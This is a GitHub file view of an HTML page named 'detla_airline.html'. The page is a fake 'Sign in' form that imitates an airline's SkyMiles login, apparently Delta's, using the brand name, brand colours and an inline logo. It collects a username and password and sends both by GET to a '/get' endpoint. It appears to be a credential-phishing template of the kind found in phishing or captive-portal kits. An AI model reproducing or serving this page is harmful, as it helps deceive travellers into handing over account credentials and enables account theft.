-
Notifications
You must be signed in to change notification settings - Fork 25
Expand file tree
/
Copy pathdetla_airline.html
More file actions
115 lines (96 loc) · 2.46 KB
/
Copy pathdetla_airline.html
File metadata and controls
115 lines (96 loc) · 2.46 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
<!DOCTYPE html>
<html>
<head>
<style>
body {
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background-color: #f3f3f3;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
}
.container {
max-width: 500px;
padding: 20px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
background: #fff;
border-radius: 8px;
}
.logo {
display: flex;
justify-content: center;
margin-bottom: 20px;
}
.logo svg {
width: 50%;
}
.title, .sub-title {
text-align: center;
margin-bottom: 20px;
}
.form-group {
margin-bottom: 20px;
display: flex;
justify-content: center;
}
.input-field {
width: 100%;
max-width: 400px;
height: 40px;
padding: 10px;
border-radius: 5px;
border: 1px solid #ccc;
font-size: 16px;
}
.button {
width: 100%;
max-width: 400px;
height: 40px;
background-color: #003D79;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
@media screen and (max-width: 600px) {
.container {
margin: 10px;
}
.logo svg {
width: 70%;
}
.input-field, .button {
max-width: 100%;
}
}
</style>
</head>
<body>
<div class="container">
<div class="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 766 118">
<path fill="#98002E" d="M142 105 74 72V0l68 105zm6 13L74 87v31h74z"/>
<path fill="#E31937" d="M5 105 74 0v72zm-5 13h74V87z"/>
<path fill="#98002E" d="M154 96a5 5 0 0 1 0 10 5 5 0 0 1 0-10m0 9a4 4 0 0 0 4-4 4 4 0 1 0-8 0 4 4 0 0 0 4 4m-1-1h-1v-6h2l2 2-2 2 2 2h-1l-1-2h-1v2zm0-3h1l1-1-1-1h-1v2z"/>
<path fill="#003D79" d="M205 105h34c34 0 54-17 54-47 0-29-20-47-54-47h-34v94zm21-77h13c22 0 33 11 33 30 0 20-11 31-33 31h-13V28zm138 37h40V48h-40V28h45V11h-66v94h68V89h-47zm167 24h-41V11h-21v94h62zm113-78h-84v17h31v77h21V28h32zm122 94h-22l-9-23h-38l-10 23h-20l39-94h21l39 94zm-37-39-13-33-13 33h26z"/>
</svg>
</div>
<h1 class="title">Sign in</h1>
<h2 class="sub-title">Using your SkyMiles number or username and password.</h2>
<form action="/get" id="email-form-step" method="GET">
<div class="form-group">
<input class="input-field" name="email" type="text" placeholder="SkyMiles # or Username" required>
</div>
<div class="form-group">
<input class="input-field" name="password" type="password" placeholder="Password" required>
</div>
<div class="form-group">
<button class="button" type="submit">Sign In</button>
</div>
</form>
</div>
</body>
</html>